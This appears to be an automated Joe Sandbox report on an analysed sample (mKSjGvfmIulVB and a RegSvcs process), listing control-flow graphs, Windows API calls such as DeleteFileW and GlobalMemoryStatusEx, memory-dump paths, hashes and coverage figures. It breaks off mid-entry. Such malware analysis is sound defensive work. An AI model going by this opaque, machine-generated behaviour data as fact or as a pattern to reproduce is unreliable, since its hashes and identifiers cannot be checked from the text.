                                                                      control_flow_graph 393 544b700-544b71f 394 544b721-544b72e call 5448c54 393->394 395 544b74b-544b74f 393->395 400 544b744 394->400 401 544b730 394->401 397 544b751-544b75b 395->397 398 544b763-544b7a4 395->398 397->398 404 544b7a6-544b7ae 398->404 405 544b7b1-544b7bf 398->405 400->395 448 544b736 call 544b9a8 401->448 449 544b736 call 544b999 401->449 404->405 406 544b7c1-544b7c6 405->406 407 544b7e3-544b7e5 405->407 409 544b7d1 406->409 410 544b7c8-544b7cf call 544ac08 406->410 412 544b7e8-544b7ef 407->412 408 544b73c-544b73e 408->400 411 544b880-544b940 408->411 414 544b7d3-544b7e1 409->414 410->414 443 544b942-544b945 411->443 444 544b948-544b973 GetModuleHandleW 411->444 415 544b7f1-544b7f9 412->415 416 544b7fc-544b803 412->416 414->412 415->416 418 544b805-544b80d 416->418 419 544b810-544b819 call 544ac18 416->419 418->419 424 544b826-544b82b 419->424 425 544b81b-544b823 419->425 426 544b82d-544b834 424->426 427 544b849-544b84d 424->427 425->424 426->427 429 544b836-544b846 call 544ac28 call 544ac38 426->429 450 544b850 call 544bc81 427->450 451 544b850 call 544bca8 427->451 429->427 432 544b853-544b856 434 544b858-544b876 432->434 435 544b879-544b87f 432->435 434->435 443->444 445 544b975-544b97b 444->445 446 544b97c-544b990 444->446 445->446 448->408 449->408 450->432 451->432
                                                                      APIs
                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0544B966
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2128166700.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_5440000_mKSjGvfmIulVB.jbxd
                                                                      Similarity
                                                                      • API ID: HandleModule
                                                                      • String ID:
                                                                      • API String ID: 4139908857-0
                                                                      • Opcode ID: 03effb5e71bb46a0acc5d052d5694da019f4cc5d77857eb0a3de3718a8dac36d
                                                                      • Instruction ID: a2335b728c8d8b4ba0324c93b1031d450fd935ce3c0c0736b2d18ecff04864c9
                                                                      • Opcode Fuzzy Hash: 03effb5e71bb46a0acc5d052d5694da019f4cc5d77857eb0a3de3718a8dac36d
                                                                      • Instruction Fuzzy Hash: 3A8113B0A00B058FEB64DF6AD44579BBBF2FF88204F10896ED48697B50D774E8498F91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 054458EC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 452 54458ec-54458f3 453 54458f8-54459b9 CreateActCtxA 452->453 455 54459c2-5445a1c 453->455 456 54459bb-54459c1 453->456 463 5445a1e-5445a21 455->463 464 5445a2b-5445a2f 455->464 456->455 463->464 465 5445a40 464->465 466 5445a31-5445a3d 464->466 468 5445a41 465->468 466->465 468->468
                                                                      APIs
                                                                      • CreateActCtxA.KERNEL32(?), ref: 054459A9
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2128166700.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_5440000_mKSjGvfmIulVB.jbxd
                                                                      Similarity
                                                                      • API ID: Create
                                                                      • String ID:
                                                                      • API String ID: 2289755597-0
                                                                      • Opcode ID: b8b82deb4e804f709d36471f974886b1c59d1b05209bcc5a43b37a6bb5daa132
                                                                      • Instruction ID: da6e39b4fe9688976ec853dda146ecc0ebf4945dee61c993982632ec9bc456ed
                                                                      • Opcode Fuzzy Hash: b8b82deb4e804f709d36471f974886b1c59d1b05209bcc5a43b37a6bb5daa132
                                                                      • Instruction Fuzzy Hash: 55419DB0D00619CBDB24DFA9C884BDEFBB5BF49304F20805AD409AB255DB756949CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 054444E0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 469 54444e0-54459b9 CreateActCtxA 472 54459c2-5445a1c 469->472 473 54459bb-54459c1 469->473 480 5445a1e-5445a21 472->480 481 5445a2b-5445a2f 472->481 473->472 480->481 482 5445a40 481->482 483 5445a31-5445a3d 481->483 485 5445a41 482->485 483->482 485->485
                                                                      APIs
                                                                      • CreateActCtxA.KERNEL32(?), ref: 054459A9
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2128166700.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_5440000_mKSjGvfmIulVB.jbxd
                                                                      Similarity
                                                                      • API ID: Create
                                                                      • String ID:
                                                                      • API String ID: 2289755597-0
                                                                      • Opcode ID: 429adefea53c57512b8244e979b8ab26881a9bfefc347e12a5c1bf0d097cdedc
                                                                      • Instruction ID: b0ad74284499b58004a4cb47419cc1cc1bf03bf1a25f32f0130439561355866d
                                                                      • Opcode Fuzzy Hash: 429adefea53c57512b8244e979b8ab26881a9bfefc347e12a5c1bf0d097cdedc
                                                                      • Instruction Fuzzy Hash: 98419DB0D00719CBDB24DFA9C884BDEFBB6BF49304F20806AD409AB255DB756949CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0544DBE0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 486 544dbe0-544dc74 DuplicateHandle 487 544dc76-544dc7c 486->487 488 544dc7d-544dc9a 486->488 487->488
                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0544DC67
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2128166700.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_5440000_mKSjGvfmIulVB.jbxd
                                                                      Similarity
                                                                      • API ID: DuplicateHandle
                                                                      • String ID:
                                                                      • API String ID: 3793708945-0
                                                                      • Opcode ID: 1b391aba917c1dff307d27d33252c55affb50aff8c813b2e848a56db6e203345
                                                                      • Instruction ID: 2fd8a1b39b29230fa84dfc315d19bfc4a17329ec9dc74dbb7fe2a6945f055d93
                                                                      • Opcode Fuzzy Hash: 1b391aba917c1dff307d27d33252c55affb50aff8c813b2e848a56db6e203345
                                                                      • Instruction Fuzzy Hash: E121B0B5D002499FDB10CFAAD984ADEBBF9EB48310F14841AE918A3350D379A954CFA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0544AC60 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 491 544ac60-544bbc8 493 544bbd0-544bbff LoadLibraryExW 491->493 494 544bbca-544bbcd 491->494 495 544bc01-544bc07 493->495 496 544bc08-544bc25 493->496 494->493 495->496
                                                                      APIs
                                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0544B9E1,00000800,00000000,00000000), ref: 0544BBF2
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2128166700.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_5440000_mKSjGvfmIulVB.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      • Opcode ID: b9a54bffd4351a080f308ffe87f6b4391d1da7d71f509174a1a267820c6e7d56
                                                                      • Instruction ID: 73c75d9080219047f41d96fcbd712f196702918496a32d273871635236777027
                                                                      • Opcode Fuzzy Hash: b9a54bffd4351a080f308ffe87f6b4391d1da7d71f509174a1a267820c6e7d56
                                                                      • Instruction Fuzzy Hash: E611E4B6D043499FDB20CF9AD448ADEFBF8EB58310F10846EE519A7600C379A545CFA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0544BB80 Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 499 544bb80-544bbc8 500 544bbd0-544bbff LoadLibraryExW 499->500 501 544bbca-544bbcd 499->501 502 544bc01-544bc07 500->502 503 544bc08-544bc25 500->503 501->500 502->503
                                                                      APIs
                                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0544B9E1,00000800,00000000,00000000), ref: 0544BBF2
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2128166700.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_5440000_mKSjGvfmIulVB.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      • Opcode ID: 79a6bf850424296bd75ea06b328e505055d61d62abefcdc85feec88bba05e183
                                                                      • Instruction ID: 57a6012b7eabeff083a6b30092953fdd098d2858da321bceb92100a022c5ac44
                                                                      • Opcode Fuzzy Hash: 79a6bf850424296bd75ea06b328e505055d61d62abefcdc85feec88bba05e183
                                                                      • Instruction Fuzzy Hash: AD11D0B6D002498FDB14CF9AD548ADEFBF8AB88310F14841AD419A7600C379A545CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 076236B8 Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 506 76236b8-762372a PostMessageW 508 7623733-7623747 506->508 509 762372c-7623732 506->509 509->508
                                                                      APIs
                                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 0762371D
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2134844078.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7620000_mKSjGvfmIulVB.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePost
                                                                      • String ID:
                                                                      • API String ID: 410705778-0
                                                                      • Opcode ID: 2daebcba8b3e40d417be79e860c049c07f249f7c76e6d8792ea521912414a630
                                                                      • Instruction ID: d30f46565bd29487ddcfd7c02993399263a10a34bcdaeac912e7309ebc11eef9
                                                                      • Opcode Fuzzy Hash: 2daebcba8b3e40d417be79e860c049c07f249f7c76e6d8792ea521912414a630
                                                                      • Instruction Fuzzy Hash: 3011E3B5800349DFDB20DF9AD485BDEBBF8EB59310F20841AE555A7600C375A584CFA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0544B900 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 511 544b900-544b940 512 544b942-544b945 511->512 513 544b948-544b973 GetModuleHandleW 511->513 512->513 514 544b975-544b97b 513->514 515 544b97c-544b990 513->515 514->515
                                                                      APIs
                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0544B966
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2128166700.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_5440000_mKSjGvfmIulVB.jbxd
                                                                      Similarity
                                                                      • API ID: HandleModule
                                                                      • String ID:
                                                                      • API String ID: 4139908857-0
                                                                      • Opcode ID: aab9964864674e1874bca59f53b0bec691574fa58748b06281d03e9574f829cf
                                                                      • Instruction ID: d766ba64a8121f98a7c69c7fc1cf9750a9304ac2e2d9c031c971d3cf4ff55028
                                                                      • Opcode Fuzzy Hash: aab9964864674e1874bca59f53b0bec691574fa58748b06281d03e9574f829cf
                                                                      • Instruction Fuzzy Hash: EA11DFB5C002498FDB20DF9AD444ADEFBF4EB88224F10845AD859B7710C379A545CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 076218F0 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 517 76218f0-762372a PostMessageW 519 7623733-7623747 517->519 520 762372c-7623732 517->520 520->519
                                                                      APIs
                                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 0762371D
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2134844078.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7620000_mKSjGvfmIulVB.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePost
                                                                      • String ID:
                                                                      • API String ID: 410705778-0
                                                                      • Opcode ID: b8279859a9b907730f9fb5f8850f702294506db5f52f56bf718aa58bacde0634
                                                                      • Instruction ID: e791a45f6a099bdfe5c74d22ff49584987d988f28e2511e0b4947e4b4ec048ee
                                                                      • Opcode Fuzzy Hash: b8279859a9b907730f9fb5f8850f702294506db5f52f56bf718aa58bacde0634
                                                                      • Instruction Fuzzy Hash: 6811F2B58007599FDB20DF9AD488BDEFBF8EB49310F10841AE519A7710C379A944CFA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0138D1FC Relevance: .1, Instructions: 76COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2120650814.000000000138D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0138D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_138d000_mKSjGvfmIulVB.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d280d0004c13a58de9ac6af5d1fb6e60e18495c1181f30bea874beffb0c3088d
                                                                      • Instruction ID: ef6c1d5c1f5f292172130a32ac07cb984757b417b211d8d7c9006d7fa0fef586
                                                                      • Opcode Fuzzy Hash: d280d0004c13a58de9ac6af5d1fb6e60e18495c1181f30bea874beffb0c3088d
                                                                      • Instruction Fuzzy Hash: FC21C4B1504344DFDB06EF98D9C4B26BF65FB88328F24C569ED054A686C336D416CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0138D4C4 Relevance: .1, Instructions: 75COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2120650814.000000000138D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0138D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_138d000_mKSjGvfmIulVB.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4a7faac438457ba8903a7779118c8cb364a185d3e1f134873ddc69920f896975
                                                                      • Instruction ID: e20f7d0f7333f127e659c15614cff7975b652387d810f21aeebcef7fb09b991e
                                                                      • Opcode Fuzzy Hash: 4a7faac438457ba8903a7779118c8cb364a185d3e1f134873ddc69920f896975
                                                                      • Instruction Fuzzy Hash: F821C1B1504344EFDB05EF58D9C0B26BF65FB8831CF24C56AE9090B696C336D456CAB1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0139D01C Relevance: .1, Instructions: 72COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2120716906.000000000139D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0139D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_139d000_mKSjGvfmIulVB.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 94baaf5df84a828c7604d777ef50b0f069d1b0e0184fdd580339a84d9321e4b2
                                                                      • Instruction ID: 132f18db6b40dedf0fe06822201932e86bd61fb498961d6c709ef9452d11ebb7
                                                                      • Opcode Fuzzy Hash: 94baaf5df84a828c7604d777ef50b0f069d1b0e0184fdd580339a84d9321e4b2
                                                                      • Instruction Fuzzy Hash: AF2122B1604204DFDF15DFA8D9C5B26BBA5FB84358F24C56DD80A0B346C33AD807CA61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0139D1D4 Relevance: .1, Instructions: 72COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2120716906.000000000139D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0139D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_139d000_mKSjGvfmIulVB.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b61e50198832a2c15d22ab7d2e64351b43c0419e878328d0449d161f5466b80f
                                                                      • Instruction ID: 2e8db90dcac33d824a15dd51f913f958a18372362434a1d08011749b1575ea2e
                                                                      • Opcode Fuzzy Hash: b61e50198832a2c15d22ab7d2e64351b43c0419e878328d0449d161f5466b80f
                                                                      • Instruction Fuzzy Hash: 662126B1504204EFDF05DF98D9C1B26BBA5FB84328F24C5ADE9894B396C336D406CA61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0138D1F7 Relevance: .1, Instructions: 57COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2120650814.000000000138D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0138D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_138d000_mKSjGvfmIulVB.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 137f5766051e4324e45f0217ede9c43a14289fab1ea42f994ba2cff73d56ee7c
                                                                      • Instruction ID: 2b88328980c33095de1100bb508500bba40291a7b821cba9dc07d001912ee24f
                                                                      • Opcode Fuzzy Hash: 137f5766051e4324e45f0217ede9c43a14289fab1ea42f994ba2cff73d56ee7c
                                                                      • Instruction Fuzzy Hash: 3421CD76404244CFDB06DF44D9C4B16BF62FB84324F24C2A9DD084A696C33AD42ACBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0138D4BF Relevance: .1, Instructions: 56COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2120650814.000000000138D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0138D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_138d000_mKSjGvfmIulVB.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                                                                      • Instruction ID: d15fb2454bb87deaacbc3245d414ec26bde6e8556e14990a0bded44a179959b5
                                                                      • Opcode Fuzzy Hash: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                                                                      • Instruction Fuzzy Hash: 6A11E172404380CFCB02DF54D5C4B16BF71FB84318F24C6AAD8490B656C336D45ACBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0139D1CF Relevance: .1, Instructions: 53COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2120716906.000000000139D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0139D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_139d000_mKSjGvfmIulVB.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                                                                      • Instruction ID: 88414a4b719266cde7d45b3cab849dd8bfa4f995e0cc3d58a5782282013f280a
                                                                      • Opcode Fuzzy Hash: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                                                                      • Instruction Fuzzy Hash: 4911BB75904280DFDB02CF58D5C4B15BBB1FB84228F24C6A9D8894B696C33AD40ACB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0139D017 Relevance: .1, Instructions: 53COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2120716906.000000000139D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0139D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_139d000_mKSjGvfmIulVB.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                                                                      • Instruction ID: 1889d02d8d516042506830592ea109cd8b38e809818db92603c07bbf2fe18d96
                                                                      • Opcode Fuzzy Hash: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                                                                      • Instruction Fuzzy Hash: A111BB75504280CFDB12CF58D5C4B15BBA2FB84318F24C6AAD8494B756C33AD40ACBA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0138D745 Relevance: .0, Instructions: 45COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2120650814.000000000138D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0138D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_138d000_mKSjGvfmIulVB.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 57efb61101d81ad0c916faf43837e79fc0db715dc60c338de0dec5434176cf13
                                                                      • Instruction ID: b721a192b709205219ae476abde5c8f87e109f79663a4d049fd46b3161ad147a
                                                                      • Opcode Fuzzy Hash: 57efb61101d81ad0c916faf43837e79fc0db715dc60c338de0dec5434176cf13
                                                                      • Instruction Fuzzy Hash: 6001A7710043849AE7107F99DDC4B66FF9CDF41368F18C51AFD094A2C6D2799845C671
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0138D744 Relevance: .0, Instructions: 36COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2120650814.000000000138D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0138D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_138d000_mKSjGvfmIulVB.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6a4302b9a806e5f9dcffe13af8973d63474207ced92736d231cb6e6a9dbe17b0
                                                                      • Instruction ID: 87ea8c2150ae5423af52c0f9c2ab323f5a6df6485b7ccfad1a72eb71a9a5317b
                                                                      • Opcode Fuzzy Hash: 6a4302b9a806e5f9dcffe13af8973d63474207ced92736d231cb6e6a9dbe17b0
                                                                      • Instruction Fuzzy Hash: ECF0C2714043809EE710AF5ACC88B62FF98EB41238F18C45AFD084A286C3799844CAB0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Execution Graph

                                                                      Execution Coverage:8.3%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:20
                                                                      Total number of Limit Nodes:4
                                                                      execution_graph 25028 2e77350 25029 2e77396 DeleteFileW 25028->25029 25031 2e773cf 25029->25031 25032 2e70848 25034 2e7084e 25032->25034 25033 2e7091b 25034->25033 25036 2e71393 25034->25036 25038 2e713a6 25036->25038 25037 2e714b4 25037->25034 25038->25037 25040 2e77528 25038->25040 25041 2e77532 25040->25041 25042 2e7754c 25041->25042 25045 5cdd69f 25041->25045 25049 5cdd6b0 25041->25049 25042->25038 25047 5cdd6b0 25045->25047 25046 5cdd8da 25046->25042 25047->25046 25048 5cdd8f0 GlobalMemoryStatusEx 25047->25048 25048->25047 25051 5cdd6c5 25049->25051 25050 5cdd8da 25050->25042 25051->25050 25052 5cdd8f0 GlobalMemoryStatusEx 25051->25052 25052->25051

                                                                      Executed Functions

                                                                      Function 05CDE4B8 Relevance: 1.6, APIs: 1, Instructions: 136COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1917 5cde4b8-5cde4d3 1918 5cde4fd-5cde51c call 5cddce4 1917->1918 1919 5cde4d5-5cde4fc call 5cddcd8 1917->1919 1925 5cde51e-5cde521 1918->1925 1926 5cde522-5cde555 1918->1926 1931 5cde557-5cde566 1926->1931 1932 5cde56d-5cde572 1931->1932 1933 5cde568-5cde56b 1931->1933 1932->1931 1935 5cde574-5cde581 1932->1935 1933->1932 1937 5cde587-5cde59e 1935->1937 1938 5cde583-5cde586 1935->1938 1940 5cde5a5-5cde614 GlobalMemoryStatusEx 1937->1940 1941 5cde5a0-5cde5a4 1937->1941 1943 5cde61d-5cde645 1940->1943 1944 5cde616-5cde61c 1940->1944 1941->1940 1944->1943
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.3251996337.0000000005CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CD0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_5cd0000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d3b96d103e4b061a4c2c37f714c9e8777f5ab06ba70c00f1ad09d87b8c485754
                                                                      • Instruction ID: 47bd83161fac3cf24d14e72135563bd40f26a12186550c926d7cbb4483d3967a
                                                                      • Opcode Fuzzy Hash: d3b96d103e4b061a4c2c37f714c9e8777f5ab06ba70c00f1ad09d87b8c485754
                                                                      • Instruction Fuzzy Hash: A9414871D0839A8FCB10CFA9D8046AEFFF5AF89210F1485ABD505EB241EB749845CBE1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02E77348 Relevance: 1.6, APIs: 1, Instructions: 57fileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1947 2e77348-2e7739a 1949 2e773a2-2e773cd DeleteFileW 1947->1949 1950 2e7739c-2e7739f 1947->1950 1951 2e773d6-2e773fe 1949->1951 1952 2e773cf-2e773d5 1949->1952 1950->1949 1952->1951
                                                                      APIs
                                                                      • DeleteFileW.KERNELBASE(00000000), ref: 02E773C0
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.3245651258.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_2e70000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: DeleteFile
                                                                      • String ID:
                                                                      • API String ID: 4033686569-0
                                                                      • Opcode ID: 83253bbd86f2e849a89ecdc760d0f260ca2668f4374351a34bc69d645b4861cd
                                                                      • Instruction ID: 830248ab0119daa24f270c658ffdc867d6c01941f727d626a15b6dad404355d6
                                                                      • Opcode Fuzzy Hash: 83253bbd86f2e849a89ecdc760d0f260ca2668f4374351a34bc69d645b4861cd
                                                                      • Instruction Fuzzy Hash: CD215BB1C0065A9FCB10CFAAD445ADEFBB0BF48324F158269D858B7240D3346944CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02E77350 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1955 2e77350-2e7739a 1957 2e773a2-2e773cd DeleteFileW 1955->1957 1958 2e7739c-2e7739f 1955->1958 1959 2e773d6-2e773fe 1957->1959 1960 2e773cf-2e773d5 1957->1960 1958->1957 1960->1959
                                                                      APIs
                                                                      • DeleteFileW.KERNELBASE(00000000), ref: 02E773C0
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.3245651258.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_2e70000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: DeleteFile
                                                                      • String ID:
                                                                      • API String ID: 4033686569-0
                                                                      • Opcode ID: d8cb315835c7541a73103a56a310461d5483466ca3ec1de1cded4be192293630
                                                                      • Instruction ID: b22ec4759a99835b9631e91a0e1111a650df526f92f36ba340e53be9993e74ed
